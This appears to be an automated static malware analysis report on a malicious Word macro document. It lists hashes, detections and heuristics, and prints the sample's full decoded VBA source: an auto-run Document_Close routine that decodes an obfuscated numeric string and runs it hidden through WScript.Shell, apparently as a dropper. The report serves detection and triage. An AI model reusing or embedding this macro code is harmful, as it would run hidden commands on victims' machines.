Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d2b3946be545c3da…

MALICIOUS

Office (OOXML)

Size: 36.9 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-03-10
MD5: fa7c4c891eeea64acb6b517da7cf2615
SHA-1: 861fd776cdad3147e66cd7318c5656fabae5d310
SHA-256: d2b3946be545c3da30e779f60e73db1796073d6ca5ebef49a7cea7a75169cabf
Risk Score: 284

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The macros use WScript.Shell and the Shell() function to execute commands, indicating dropper or downloader functionality. The ClamAV detection 'Doc.Dropper.Agent-6398372-0' further supports this assessment. The script attempts to run a long, obfuscated string, likely a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6398372-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6398372-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(inoltrare) < 4774 Then
        CreateObject("WScript.Shell").Run inoltrare, vbHide * 4
      End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(inoltrare) < 4774 Then
        CreateObject("WScript.Shell").Run inoltrare, vbHide * 4
      End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL: http://schemas.openxmlformats.org/markup-compatibility/2006  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.openxmlformats.org/officeDocument/2006/relationships  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.openxmlformats.org/officeDocument/2006/math  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.openxmlformats.org/wordprocessingml/2006/main  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2006/wordml  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/drawing/2010/main  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2010/wordprocessingShape  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2010/wordprocessingInk  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2010/wordml  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  Channel: In document text (OOXML body / shared strings)
    • URL: http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  Channel: In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2587 bytes
SHA-256: c054413918efdf1726987f2b694fffb94d0c6991e20e9ad2c64da4a8818d8b28
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function coperto(micelio As Integer) As String
 impiego = Array("v", "(", "P", "q", "/", "F", "d", "O", "D", "k", "A", "$", "o", ";", "C", "i", "r", "S", "w", "'", "T", "y", "c", ",", "B", "x", "t", "h", "I", "N", "l", "n", " ", "j", ")", "=", "-", "b", "?", ".", "E", "a", "m", "s", "e", "+", "p", "V", "\", "z", "W", "g", "u", ":")
 Dim lepre As Integer
 
 For lepre = LBound(impiego) To UBound(impiego)
   If lepre = micelio Then
    coperto = impiego(lepre)
   End If
 Next
 
End Function


Public Function tromba(inoltrare As String)
  If Len(inoltrare) < 4774 Then
    CreateObject("WScript.Shell").Run inoltrare, vbHide * 4
  End If
End Function

Sub Document_Close()
 feralo = pilifero("46121844164327443030323629124025152632364025442232242146414343323614124242413106320129441836073733442226321721432644423929442639504437143015443126343908121831301241060515304401192726264653040418061503180633271652414121212121414306060606392212420417170409413141261539304942192332114431005310020208102010324532194833462846473944254419341332172641162636021612224443433211443100531002020810201019483346284647394425441913320129441836073733442226321721432644423929442639504437143015443126343908121831301241061726161531510119272626465304041806150318063327165241412121212141430606060639221242044339462746381506350941314126151934")
 Application.Run "tromba", feralo
End Sub

Function etilico(ByVal carapace, ByVal vento) As String
 
 periodo = vbNullString
 parlato = Array(carapace, vento)
 
 For tattico = 0 To UBound(parlato)
   periodo = periodo + vbNullString + parlato(tattico) + vbNullString
 Next
 
 etilico = periodo
End Function

Function pilifero(Optional ribelle As String, Optional ribelle2)
  coricato = focoso(Trim(ribelle))
  sfamato = ""

  For lepre = 0 To Len(ribelle)
    If (lepre + 1) <= UBound(coricato) Then
    uovo = coricato(lepre + 1)
    proteso = coricato(lepre)
    onice = coperto(Int(coricato(lepre) + uovo))
    sfamato = etilico(sfamato, onice)
    lepre = lepre + 1
    End If
  Next
  
  pilifero = sfamato
End Function


Function focoso(cammino As String, Optional targato As Integer) As Variant
    focoso = Split(Left(StrConv(cammino, vbUnicode), Len(StrConv(cammino, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes
SHA-256: 36df2ac54eee9a4c89356c73bbb1e1cdda9887ae085208c9379fc2664304b40b
Detection
ClamAV: Doc.Dropper.Agent-6398372-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).